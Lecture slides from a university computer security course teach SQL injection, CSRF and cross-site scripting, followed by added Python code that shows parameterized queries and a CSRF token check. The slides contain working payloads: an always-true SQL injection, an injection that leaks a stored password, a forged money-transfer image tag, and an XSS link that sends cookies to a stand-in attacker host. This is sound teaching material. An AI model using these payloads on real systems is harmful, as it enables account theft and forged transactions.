Berkeley COMPSCI 161 - Web Attacks
Web Attacks, con't
CS 161: Computer Security
Prof. Vern Paxson
TAs: Devdatta Akhawe, Mobin Javed, Matthias Vallentin
http://inst.eecs.berkeley.edu/~cs161/
February 24, 2011

Announcements

Guest lecture a week from Thursday (March 3rd): Prof. David Wagner. Correction: the material will not be in scope for the Midterm.
My office hours the week of March 7th will be by appointment.
Homework 2 should be out by tonight, due in 1 week.

Goals For Today

Make previously discussed web attacks concrete: SQL injection, Cross-Site Request Forgery (CSRF), Reflected Cross-Site Scripting (XSS).
Illustrate additional web attacks: Stored XSS, Clickjacking. And discuss defenses.

SQL Injection Scenario

Suppose the web server front end stores the URL parameter "recipient" in the variable $recipient and then builds up a string with the following SQL query:

  $sql = "SELECT PersonID FROM Person WHERE (Balance < 100) AND (Username = '$recipient')";

How can $recipient cause trouble here? How can we see anyone's account?

SQL Injection Scenario, con't

  WHERE (Balance < 100) AND (Username = '$recipient')

  $recipient = "foo') OR (1=1); --"

  WHERE (Balance < 100) AND (Username = 'foo') OR (1=1); --')

Precedence, plus the comment (--) swallowing the trailing quote and parenthesis, makes this

  WHERE ((Balance < 100) AND (Username = 'foo')) OR (1=1)

which is always true.

Demo Tools

Bro: freeware network monitoring tool. Scriptable. Primarily designed for real-time intrusion detection. www.bro-ids.org
Squigler: cool localhost web site(s), Python + SQLite. Developed by Arel Cordero. Let me know if you'd like a copy to play with.

Server code for posting a squig:

  import sqlite3

  DBFN = "squigler.db"   # path to the SQLite database (value not shown on the slide)

  def post_squig(user, squig):
      if not user or not squig:
          return
      conn = sqlite3.connect(DBFN)
      c = conn.cursor()
      # The squig text is spliced straight into the SQL string
      c.executescript("INSERT INTO squigs VALUES ('%s', '%s', datetime('now'));" % (user, squig))
      conn.commit()
      c.close()

What the server ends up executing (date abbreviates the datetime('now') call):

  INSERT INTO squigs VALUES ('dilbert', 'don't contractions work', date);
  Syntax error.

  INSERT INTO squigs VALUES ('dilbert', '' || (select password from accounts where username='bob') || '', date);
  '' and '' are empty string literals; || is the concatenation operator.
  Concatenation of string S with the empty string is just S, so the value of the squig will be Bob's password.

Web Accesses w/ Side Effects

Recall our earlier banking URL:
  http://mybank.com/moneyxfer.cgi?account=alice&amt=50&to=bob

So what happens if we visit evilsite.com, which includes
  <img src="http://mybank.com/moneyxfer.cgi?Account=alice&amt=500000&to=DrEvil">

Cross-Site Request Forgery (CSRF) attack.

Web Action With Side Effect

URL fetch for posting a squig. Request to 127.0.0.1:8080:

  GET /do_squig?redirect=%2Fuserpage%3Fuser%3Ddilbert&squig=squigs+speak+a+deep+truth
  HOST: localhost:8080
  REFERER: http://localhost:8080/userpage?user=dilbert
  COOKIE: session_id=5321506

Authenticated with a cookie that the browser automatically sends along.

Subversive Script Execution

Cross-Site Scripting (XSS). Attacker's goal: cause the victim's browser to execute Javascript written by the attacker, but with the browser believing that the script instead was sent by a trusted server (mybank.com). This circumvents the Same Origin Policy (SOP), which would prevent the browser from letting Javascript received directly from evil.com have full access to content from mybank.com.
Do not confuse with CSRF. CSRF is about web requests with side effects; XSS is about getting Javascript treated as though a trusted server sent it.

The Setup

User input is echoed into the HTML response. Example: search field
  http://victim.com/search.php?term=apple

search.php responds with HTML:
  <HTML>
  <TITLE>Search Results</TITLE>
  <BODY>
  Results for <?php echo $_GET[term] ?>:
  ...
  </BODY>
  </HTML>

How can an attacker exploit this?

Injection Via Bad Input

Consider this link (properly URL encoded):
  http://victim.com/search.php?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

What if the user clicks on this link?
1. Browser goes to victim.com/search.php
2. victim.com returns
   <HTML> Results for <script> ... </script>
3. Browser executes the script in the same origin as victim.com: sends badguy.com the cookie for victim.com. Or any other arbitrary execution: rewrite the victim.com page, ...

Demo on (1) finding and (2) exploiting reflected XSS vulnerabilities.

Cross-Site Scripting (XSS)
[diagram; participants: Victim client, Attack Server, Server Patsy/Victim]
1. visit web site
2. receive malicious page
3. click on link (exact URL under attacker's control)
4. echo user input
5. execute script embedded in input as though server meant us to run it
6. perform attacker action
7. valuable data (and/or)
Reflected XSS attacks.

Stored Cross-Site Scripting
[diagram; participants: Attack Server, Server Patsy/Victim, User Victim]
1. Inject malicious script
…
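The Squigler injection above, reproduced against an in-memory SQLite database and set beside a parameterized version of post_squig. This is added example code, not the Squigler project's own; the accounts/squigs schema and Bob's password are constructed sample data.

```python
import sqlite3

# Constructed sample schema and data (not from the slides).
SCHEMA = """
CREATE TABLE accounts (username TEXT, password TEXT);
CREATE TABLE squigs (user TEXT, squig TEXT, posted TEXT);
INSERT INTO accounts VALUES ('bob', 'hunter2');
"""

# The slides' payload: '' || (select ...) || '' once spliced between the quotes.
PAYLOAD = "' || (select password from accounts where username='bob') || '"

def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def post_squig_vulnerable(conn, user, squig):
    """Squigler style: the squig text becomes part of the SQL program."""
    c = conn.cursor()
    c.executescript("INSERT INTO squigs VALUES ('%s', '%s', datetime('now'));" % (user, squig))
    conn.commit()

def post_squig_safe(conn, user, squig):
    """Hardened: bound parameters, so the driver never parses squig as SQL."""
    c = conn.cursor()
    c.execute("INSERT INTO squigs VALUES (?, ?, datetime('now'))", (user, squig))
    conn.commit()

def last_squig(conn):
    return conn.execute("SELECT squig FROM squigs ORDER BY rowid DESC LIMIT 1").fetchone()[0]

def contraction_demo():
    """The slides' first probe: an apostrophe breaks the spliced query but not the bound one."""
    conn = fresh_db()
    try:
        post_squig_vulnerable(conn, "dilbert", "don't contractions work")
        broke = False
    except sqlite3.OperationalError:   # SQLite reports the syntax error
        broke = True
    post_squig_safe(conn, "dilbert", "don't contractions work")
    return broke, last_squig(conn)

def password_demo():
    """Vulnerable path stores Bob's password; safe path stores the payload text verbatim."""
    conn = fresh_db()
    post_squig_vulnerable(conn, "dilbert", PAYLOAD)
    leaked = last_squig(conn)
    post_squig_safe(conn, "dilbert", PAYLOAD)
    return leaked, last_squig(conn)
```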
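The do_squig request from the CSRF slides, handled by a server that no longer trusts the automatically sent cookie alone: a side-effecting action must also carry a token bound to the session, which a page on another origin cannot read. Added example code, not Squigler's; the request text, the session table and the server secret are constructed, and the csrf query parameter is an assumed name.

```python
import hmac
import hashlib
from urllib.parse import urlsplit, parse_qs

# Constructed server state (not from the slides).
SERVER_SECRET = b"replace-with-a-random-secret"
SESSIONS = {"5321506": "dilbert"}          # session_id -> logged-in user

def csrf_token(session_id):
    """Token derived from the session; the page embeds it in its own forms/links."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def parse_request(raw):
    """Minimal parser for the request shape shown on the slide."""
    lines = raw.strip().splitlines()
    method, target = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().upper()] = value.strip()
    cookies = dict(p.strip().split("=", 1)
                   for p in headers.get("COOKIE", "").split(";") if "=" in p)
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return method, parts.path, query, headers, cookies

def handle_do_squig(raw):
    """Returns ('posted', user, squig) or ('rejected', reason)."""
    method, path, query, headers, cookies = parse_request(raw)
    user = SESSIONS.get(cookies.get("session_id"))
    if user is None:
        return ("rejected", "no valid session cookie")
    # The cookie proves who the browser is, not that the user meant this request.
    expected = csrf_token(cookies["session_id"])
    if not hmac.compare_digest(query.get("csrf", ""), expected):
        return ("rejected", "missing or wrong CSRF token")
    return ("posted", user, query.get("squig", ""))

# The slide's fetch as a cross-site page would trigger it: cookie attached, no token.
FORGED = """GET /do_squig?redirect=%2Fuserpage%3Fuser%3Ddilbert&squig=squigs+speak+a+deep+truth HTTP/1.1
HOST: localhost:8080
REFERER: http://evilsite.com/page.html
COOKIE: session_id=5321506"""

def legit_request():
    """Same fetch issued from Squigler's own page, which knows the token."""
    return ("GET /do_squig?squig=squigs+speak+a+deep+truth&csrf=%s HTTP/1.1\n"
            "HOST: localhost:8080\nREFERER: http://localhost:8080/userpage?user=dilbert\n"
            "COOKIE: session_id=5321506") % csrf_token("5321506")
```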